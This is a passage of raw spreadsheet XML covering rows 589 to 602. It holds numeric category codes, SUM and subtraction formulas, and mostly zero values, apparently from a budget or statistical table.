      <c r="AA589" s="17"/>
      <c r="AB589" s="17"/>
      <c r="AC589" s="17"/>
      <c r="AD589" s="17"/>
      <c r="AE589" s="17">
        <f t="shared" ref="AE589:AP591" si="274">G589-S589</f>
        <v>0</v>
      </c>
      <c r="AF589" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AG589" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AH589" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AI589" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AJ589" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AK589" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AL589" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AM589" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AN589" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AO589" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AP589" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
    </row>
    <row r="590" ht="18" customHeight="1" spans="1:42">
      <c r="A590" s="10"/>
      <c r="B590" s="10"/>
      <c r="C590" s="28"/>
      <c r="D590" s="10">
        <v>2080602</v>
      </c>
      <c r="E590" s="16" t="s">
        <v>3409</v>
      </c>
      <c r="F590" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G590" s="17"/>
      <c r="H590" s="17"/>
      <c r="I590" s="17"/>
      <c r="J590" s="17"/>
      <c r="K590" s="17"/>
      <c r="L590" s="17"/>
      <c r="M590" s="17"/>
      <c r="N590" s="17"/>
      <c r="O590" s="17"/>
      <c r="P590" s="17"/>
      <c r="Q590" s="17"/>
      <c r="R590" s="17"/>
      <c r="S590" s="17"/>
      <c r="T590" s="17"/>
      <c r="U590" s="17"/>
      <c r="V590" s="17"/>
      <c r="W590" s="17"/>
      <c r="X590" s="17"/>
      <c r="Y590" s="17"/>
      <c r="Z590" s="17"/>
      <c r="AA590" s="17"/>
      <c r="AB590" s="17"/>
      <c r="AC590" s="17"/>
      <c r="AD590" s="17"/>
      <c r="AE590" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AF590" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AG590" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AH590" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AI590" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AJ590" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AK590" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AL590" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AM590" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AN590" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AO590" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AP590" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
    </row>
    <row r="591" ht="18" customHeight="1" spans="1:42">
      <c r="A591" s="10"/>
      <c r="B591" s="10"/>
      <c r="C591" s="28"/>
      <c r="D591" s="10">
        <v>2080699</v>
      </c>
      <c r="E591" s="16" t="s">
        <v>3410</v>
      </c>
      <c r="F591" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G591" s="17"/>
      <c r="H591" s="17"/>
      <c r="I591" s="17"/>
      <c r="J591" s="17"/>
      <c r="K591" s="17"/>
      <c r="L591" s="17"/>
      <c r="M591" s="17"/>
      <c r="N591" s="17"/>
      <c r="O591" s="17"/>
      <c r="P591" s="17"/>
      <c r="Q591" s="17"/>
      <c r="R591" s="17"/>
      <c r="S591" s="17"/>
      <c r="T591" s="17"/>
      <c r="U591" s="17"/>
      <c r="V591" s="17"/>
      <c r="W591" s="17"/>
      <c r="X591" s="17"/>
      <c r="Y591" s="17"/>
      <c r="Z591" s="17"/>
      <c r="AA591" s="17"/>
      <c r="AB591" s="17"/>
      <c r="AC591" s="17"/>
      <c r="AD591" s="17"/>
      <c r="AE591" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AF591" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AG591" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AH591" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AI591" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AJ591" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AK591" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AL591" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AM591" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AN591" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AO591" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
      <c r="AP591" s="17">
        <f t="shared" si="274"/>
        <v>0</v>
      </c>
    </row>
    <row r="592" ht="18" customHeight="1" spans="1:42">
      <c r="A592" s="10"/>
      <c r="B592" s="10"/>
      <c r="C592" s="28"/>
      <c r="D592" s="10">
        <v>20807</v>
      </c>
      <c r="E592" s="11" t="s">
        <v>3411</v>
      </c>
      <c r="F592" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G592" s="12">
        <f t="shared" ref="G592:R592" si="275">SUM(G593:G601)</f>
        <v>0</v>
      </c>
      <c r="H592" s="12">
        <f t="shared" si="275"/>
        <v>0</v>
      </c>
      <c r="I592" s="12">
        <f t="shared" si="275"/>
        <v>0</v>
      </c>
      <c r="J592" s="12">
        <f t="shared" si="275"/>
        <v>0</v>
      </c>
      <c r="K592" s="12">
        <f t="shared" si="275"/>
        <v>0</v>
      </c>
      <c r="L592" s="12">
        <f t="shared" si="275"/>
        <v>0</v>
      </c>
      <c r="M592" s="12">
        <f t="shared" si="275"/>
        <v>0</v>
      </c>
      <c r="N592" s="12">
        <f t="shared" si="275"/>
        <v>0</v>
      </c>
      <c r="O592" s="12">
        <f t="shared" si="275"/>
        <v>0</v>
      </c>
      <c r="P592" s="12">
        <f t="shared" si="275"/>
        <v>0</v>
      </c>
      <c r="Q592" s="12">
        <f t="shared" si="275"/>
        <v>0</v>
      </c>
      <c r="R592" s="12">
        <f t="shared" si="275"/>
        <v>0</v>
      </c>
      <c r="S592" s="12">
        <v>0</v>
      </c>
      <c r="T592" s="12">
        <v>0</v>
      </c>
      <c r="U592" s="12">
        <v>0</v>
      </c>
      <c r="V592" s="12">
        <v>0</v>
      </c>
      <c r="W592" s="12">
        <v>0</v>
      </c>
      <c r="X592" s="12">
        <v>0</v>
      </c>
      <c r="Y592" s="12">
        <v>0</v>
      </c>
      <c r="Z592" s="12">
        <v>0</v>
      </c>
      <c r="AA592" s="12">
        <v>0</v>
      </c>
      <c r="AB592" s="12">
        <v>0</v>
      </c>
      <c r="AC592" s="12">
        <v>0</v>
      </c>
      <c r="AD592" s="12">
        <v>0</v>
      </c>
      <c r="AE592" s="12">
        <f t="shared" ref="AE592:AP592" si="276">SUM(AE593:AE601)</f>
        <v>0</v>
      </c>
      <c r="AF592" s="12">
        <f t="shared" si="276"/>
        <v>0</v>
      </c>
      <c r="AG592" s="12">
        <f t="shared" si="276"/>
        <v>0</v>
      </c>
      <c r="AH592" s="12">
        <f t="shared" si="276"/>
        <v>0</v>
      </c>
      <c r="AI592" s="12">
        <f t="shared" si="276"/>
        <v>0</v>
      </c>
      <c r="AJ592" s="12">
        <f t="shared" si="276"/>
        <v>0</v>
      </c>
      <c r="AK592" s="12">
        <f t="shared" si="276"/>
        <v>0</v>
      </c>
      <c r="AL592" s="12">
        <f t="shared" si="276"/>
        <v>0</v>
      </c>
      <c r="AM592" s="12">
        <f t="shared" si="276"/>
        <v>0</v>
      </c>
      <c r="AN592" s="12">
        <f t="shared" si="276"/>
        <v>0</v>
      </c>
      <c r="AO592" s="12">
        <f t="shared" si="276"/>
        <v>0</v>
      </c>
      <c r="AP592" s="12">
        <f t="shared" si="276"/>
        <v>0</v>
      </c>
    </row>
    <row r="593" ht="18" customHeight="1" spans="1:42">
      <c r="A593" s="10"/>
      <c r="B593" s="10"/>
      <c r="C593" s="28"/>
      <c r="D593" s="10">
        <v>2080701</v>
      </c>
      <c r="E593" s="16" t="s">
        <v>3412</v>
      </c>
      <c r="F593" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G593" s="17"/>
      <c r="H593" s="17"/>
      <c r="I593" s="17"/>
      <c r="J593" s="17"/>
      <c r="K593" s="17"/>
      <c r="L593" s="17"/>
      <c r="M593" s="17"/>
      <c r="N593" s="17"/>
      <c r="O593" s="17"/>
      <c r="P593" s="17"/>
      <c r="Q593" s="17"/>
      <c r="R593" s="17"/>
      <c r="S593" s="17"/>
      <c r="T593" s="17"/>
      <c r="U593" s="17"/>
      <c r="V593" s="17"/>
      <c r="W593" s="17"/>
      <c r="X593" s="17"/>
      <c r="Y593" s="17"/>
      <c r="Z593" s="17"/>
      <c r="AA593" s="17"/>
      <c r="AB593" s="17"/>
      <c r="AC593" s="17"/>
      <c r="AD593" s="17"/>
      <c r="AE593" s="17">
        <f t="shared" ref="AE593:AP601" si="277">G593-S593</f>
        <v>0</v>
      </c>
      <c r="AF593" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AG593" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AH593" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AI593" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AJ593" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AK593" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AL593" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AM593" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AN593" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AO593" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AP593" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
    </row>
    <row r="594" ht="18" customHeight="1" spans="1:42">
      <c r="A594" s="10"/>
      <c r="B594" s="10"/>
      <c r="C594" s="28"/>
      <c r="D594" s="10">
        <v>2080702</v>
      </c>
      <c r="E594" s="16" t="s">
        <v>3413</v>
      </c>
      <c r="F594" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G594" s="17"/>
      <c r="H594" s="17"/>
      <c r="I594" s="17"/>
      <c r="J594" s="17"/>
      <c r="K594" s="17"/>
      <c r="L594" s="17"/>
      <c r="M594" s="17"/>
      <c r="N594" s="17"/>
      <c r="O594" s="17"/>
      <c r="P594" s="17"/>
      <c r="Q594" s="17"/>
      <c r="R594" s="17"/>
      <c r="S594" s="17"/>
      <c r="T594" s="17"/>
      <c r="U594" s="17"/>
      <c r="V594" s="17"/>
      <c r="W594" s="17"/>
      <c r="X594" s="17"/>
      <c r="Y594" s="17"/>
      <c r="Z594" s="17"/>
      <c r="AA594" s="17"/>
      <c r="AB594" s="17"/>
      <c r="AC594" s="17"/>
      <c r="AD594" s="17"/>
      <c r="AE594" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AF594" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AG594" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AH594" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AI594" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AJ594" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AK594" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AL594" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AM594" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AN594" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AO594" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AP594" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
    </row>
    <row r="595" ht="18" customHeight="1" spans="1:42">
      <c r="A595" s="10"/>
      <c r="B595" s="10"/>
      <c r="C595" s="28"/>
      <c r="D595" s="10">
        <v>2080704</v>
      </c>
      <c r="E595" s="16" t="s">
        <v>3414</v>
      </c>
      <c r="F595" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G595" s="17"/>
      <c r="H595" s="17"/>
      <c r="I595" s="17"/>
      <c r="J595" s="17"/>
      <c r="K595" s="17"/>
      <c r="L595" s="17"/>
      <c r="M595" s="17"/>
      <c r="N595" s="17"/>
      <c r="O595" s="17"/>
      <c r="P595" s="17"/>
      <c r="Q595" s="17"/>
      <c r="R595" s="17"/>
      <c r="S595" s="17"/>
      <c r="T595" s="17"/>
      <c r="U595" s="17"/>
      <c r="V595" s="17"/>
      <c r="W595" s="17"/>
      <c r="X595" s="17"/>
      <c r="Y595" s="17"/>
      <c r="Z595" s="17"/>
      <c r="AA595" s="17"/>
      <c r="AB595" s="17"/>
      <c r="AC595" s="17"/>
      <c r="AD595" s="17"/>
      <c r="AE595" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AF595" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AG595" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AH595" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AI595" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AJ595" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AK595" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AL595" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AM595" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AN595" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AO595" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AP595" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
    </row>
    <row r="596" ht="18" customHeight="1" spans="1:42">
      <c r="A596" s="10"/>
      <c r="B596" s="10"/>
      <c r="C596" s="28"/>
      <c r="D596" s="10">
        <v>2080705</v>
      </c>
      <c r="E596" s="16" t="s">
        <v>3415</v>
      </c>
      <c r="F596" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G596" s="17"/>
      <c r="H596" s="17"/>
      <c r="I596" s="17"/>
      <c r="J596" s="17"/>
      <c r="K596" s="17"/>
      <c r="L596" s="17"/>
      <c r="M596" s="17"/>
      <c r="N596" s="17"/>
      <c r="O596" s="17"/>
      <c r="P596" s="17"/>
      <c r="Q596" s="17"/>
      <c r="R596" s="17"/>
      <c r="S596" s="17"/>
      <c r="T596" s="17"/>
      <c r="U596" s="17"/>
      <c r="V596" s="17"/>
      <c r="W596" s="17"/>
      <c r="X596" s="17"/>
      <c r="Y596" s="17"/>
      <c r="Z596" s="17"/>
      <c r="AA596" s="17"/>
      <c r="AB596" s="17"/>
      <c r="AC596" s="17"/>
      <c r="AD596" s="17"/>
      <c r="AE596" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AF596" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AG596" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AH596" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AI596" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AJ596" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AK596" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AL596" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AM596" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AN596" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AO596" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AP596" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
    </row>
    <row r="597" ht="18" customHeight="1" spans="1:42">
      <c r="A597" s="10"/>
      <c r="B597" s="10"/>
      <c r="C597" s="28"/>
      <c r="D597" s="10">
        <v>2080709</v>
      </c>
      <c r="E597" s="16" t="s">
        <v>3416</v>
      </c>
      <c r="F597" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G597" s="17"/>
      <c r="H597" s="17"/>
      <c r="I597" s="17"/>
      <c r="J597" s="17"/>
      <c r="K597" s="17"/>
      <c r="L597" s="17"/>
      <c r="M597" s="17"/>
      <c r="N597" s="17"/>
      <c r="O597" s="17"/>
      <c r="P597" s="17"/>
      <c r="Q597" s="17"/>
      <c r="R597" s="17"/>
      <c r="S597" s="17"/>
      <c r="T597" s="17"/>
      <c r="U597" s="17"/>
      <c r="V597" s="17"/>
      <c r="W597" s="17"/>
      <c r="X597" s="17"/>
      <c r="Y597" s="17"/>
      <c r="Z597" s="17"/>
      <c r="AA597" s="17"/>
      <c r="AB597" s="17"/>
      <c r="AC597" s="17"/>
      <c r="AD597" s="17"/>
      <c r="AE597" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AF597" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AG597" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AH597" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AI597" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AJ597" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AK597" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AL597" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AM597" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AN597" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AO597" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AP597" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
    </row>
    <row r="598" ht="18" customHeight="1" spans="1:42">
      <c r="A598" s="10"/>
      <c r="B598" s="10"/>
      <c r="C598" s="28"/>
      <c r="D598" s="10">
        <v>2080711</v>
      </c>
      <c r="E598" s="16" t="s">
        <v>3417</v>
      </c>
      <c r="F598" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G598" s="17"/>
      <c r="H598" s="17"/>
      <c r="I598" s="17"/>
      <c r="J598" s="17"/>
      <c r="K598" s="17"/>
      <c r="L598" s="17"/>
      <c r="M598" s="17"/>
      <c r="N598" s="17"/>
      <c r="O598" s="17"/>
      <c r="P598" s="17"/>
      <c r="Q598" s="17"/>
      <c r="R598" s="17"/>
      <c r="S598" s="17"/>
      <c r="T598" s="17"/>
      <c r="U598" s="17"/>
      <c r="V598" s="17"/>
      <c r="W598" s="17"/>
      <c r="X598" s="17"/>
      <c r="Y598" s="17"/>
      <c r="Z598" s="17"/>
      <c r="AA598" s="17"/>
      <c r="AB598" s="17"/>
      <c r="AC598" s="17"/>
      <c r="AD598" s="17"/>
      <c r="AE598" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AF598" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AG598" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AH598" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AI598" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AJ598" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AK598" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AL598" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AM598" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AN598" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AO598" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AP598" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
    </row>
    <row r="599" ht="18" customHeight="1" spans="1:42">
      <c r="A599" s="10"/>
      <c r="B599" s="10"/>
      <c r="C599" s="28"/>
      <c r="D599" s="10">
        <v>2080712</v>
      </c>
      <c r="E599" s="16" t="s">
        <v>3418</v>
      </c>
      <c r="F599" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G599" s="17"/>
      <c r="H599" s="17"/>
      <c r="I599" s="17"/>
      <c r="J599" s="17"/>
      <c r="K599" s="17"/>
      <c r="L599" s="17"/>
      <c r="M599" s="17"/>
      <c r="N599" s="17"/>
      <c r="O599" s="17"/>
      <c r="P599" s="17"/>
      <c r="Q599" s="17"/>
      <c r="R599" s="17"/>
      <c r="S599" s="17"/>
      <c r="T599" s="17"/>
      <c r="U599" s="17"/>
      <c r="V599" s="17"/>
      <c r="W599" s="17"/>
      <c r="X599" s="17"/>
      <c r="Y599" s="17"/>
      <c r="Z599" s="17"/>
      <c r="AA599" s="17"/>
      <c r="AB599" s="17"/>
      <c r="AC599" s="17"/>
      <c r="AD599" s="17"/>
      <c r="AE599" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AF599" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AG599" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AH599" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AI599" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AJ599" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AK599" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AL599" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AM599" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AN599" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AO599" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AP599" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
    </row>
    <row r="600" ht="18" customHeight="1" spans="1:42">
      <c r="A600" s="10"/>
      <c r="B600" s="10"/>
      <c r="C600" s="28"/>
      <c r="D600" s="10">
        <v>2080713</v>
      </c>
      <c r="E600" s="16" t="s">
        <v>3419</v>
      </c>
      <c r="F600" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G600" s="17"/>
      <c r="H600" s="17"/>
      <c r="I600" s="17"/>
      <c r="J600" s="17"/>
      <c r="K600" s="17"/>
      <c r="L600" s="17"/>
      <c r="M600" s="17"/>
      <c r="N600" s="17"/>
      <c r="O600" s="17"/>
      <c r="P600" s="17"/>
      <c r="Q600" s="17"/>
      <c r="R600" s="17"/>
      <c r="S600" s="17"/>
      <c r="T600" s="17"/>
      <c r="U600" s="17"/>
      <c r="V600" s="17"/>
      <c r="W600" s="17"/>
      <c r="X600" s="17"/>
      <c r="Y600" s="17"/>
      <c r="Z600" s="17"/>
      <c r="AA600" s="17"/>
      <c r="AB600" s="17"/>
      <c r="AC600" s="17"/>
      <c r="AD600" s="17"/>
      <c r="AE600" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AF600" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AG600" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AH600" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AI600" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AJ600" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AK600" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AL600" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AM600" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AN600" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AO600" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AP600" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
    </row>
    <row r="601" ht="18" customHeight="1" spans="1:42">
      <c r="A601" s="10"/>
      <c r="B601" s="10"/>
      <c r="C601" s="28"/>
      <c r="D601" s="10">
        <v>2080799</v>
      </c>
      <c r="E601" s="16" t="s">
        <v>3420</v>
      </c>
      <c r="F601" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G601" s="17"/>
      <c r="H601" s="17"/>
      <c r="I601" s="17"/>
      <c r="J601" s="17"/>
      <c r="K601" s="17"/>
      <c r="L601" s="17"/>
      <c r="M601" s="17"/>
      <c r="N601" s="17"/>
      <c r="O601" s="17"/>
      <c r="P601" s="17"/>
      <c r="Q601" s="17"/>
      <c r="R601" s="17"/>
      <c r="S601" s="17"/>
      <c r="T601" s="17"/>
      <c r="U601" s="17"/>
      <c r="V601" s="17"/>
      <c r="W601" s="17"/>
      <c r="X601" s="17"/>
      <c r="Y601" s="17"/>
      <c r="Z601" s="17"/>
      <c r="AA601" s="17"/>
      <c r="AB601" s="17"/>
      <c r="AC601" s="17"/>
      <c r="AD601" s="17"/>
      <c r="AE601" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AF601" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AG601" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AH601" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AI601" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AJ601" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AK601" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AL601" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AM601" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AN601" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AO601" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
      <c r="AP601" s="17">
        <f t="shared" si="277"/>
        <v>0</v>
      </c>
    </row>
    <row r="602" ht="18" customHeight="1" spans="1:42">
      <c r="A602" s="10"/>
      <c r="B602" s="10"/>
      <c r="C602" s="28"/>
      <c r="D602" s="10">
        <v>20808</v>
      </c>
      <c r="E602" s="11" t="s">
        <v>3421</v>
      </c>
      <c r="F602" s="14">
        <f t="shared" si="271"/>
        <v>1113</v>
      </c>
      <c r="G602" s="12">
        <f t="shared" ref="G602:R602" si="278">SUM(G603:G609)</f>
        <v>64</v>
      </c>
      <c r="H602" s="12">
        <f t="shared" si="278"/>
        <v>121</v>
      </c>
      <c r="I602" s="12">
        <f t="shared" si="278"/>
        <v>130</v>
      </c>
      <c r="J602" s="12">
        <f t="shared" si="278"/>
        <v>181</v>
      </c>
      <c r="K602" s="12">
        <f t="shared" si="278"/>
        <v>77</v>
      </c>
      <c r="L602" s="12">
        <f t="shared" si="278"/>
        <v>208</v>
      </c>
      <c r="M602" s="12">
        <f t="shared" si="278"/>
        <v>165</v>
      </c>
      <c r="N602" s="12">
        <f t="shared" si="278"/>
        <v>89</v>
      </c>
      <c r="O602" s="12">
        <f t="shared" si="278"/>
        <v>45</v>
      </c>
      <c r="P602" s="12">
        <f t="shared" si="278"/>
        <v>93</v>
      </c>
      <c r="Q602" s="12">
        <f t="shared" si="278"/>
        <v>119</v>
      </c>
      <c r="R602" s="12">
        <f t="shared" si="278"/>
        <v>6</v>
      </c>
      <c r="S602" s="12">
        <v>65</v>
      </c>
      <c r="T602" s="12">
        <v>102</v>
      </c>
      <c r="U602" s="12">
        <v>118</v>
      </c>
      <c r="V602" s="12">
        <v>175</v>
      </c>
      <c r="W602" s="12">
        <v>77</v>
      </c>
      <c r="X602" s="12">
        <v>187</v>
      </c>
      <c r="Y602" s="12">
        <v>128</v>
      </c>
      <c r="Z602" s="12">
        <v>89</v>
      </c>
      <c r="AA602" s="12">
        <v>45</v>
      </c>
      <c r="AB602" s="12">
        <v>83</v>
      </c>
      <c r="AC602" s="12">
        <v>111</v>
      </c>
      <c r="AD602" s="12">
        <v>0</v>
      </c>
      <c r="AE602" s="12">
        <f t="shared" ref="AE602:AP602" si="279">SUM(AE603:AE609)</f>
        <v>-1</v>
      </c>
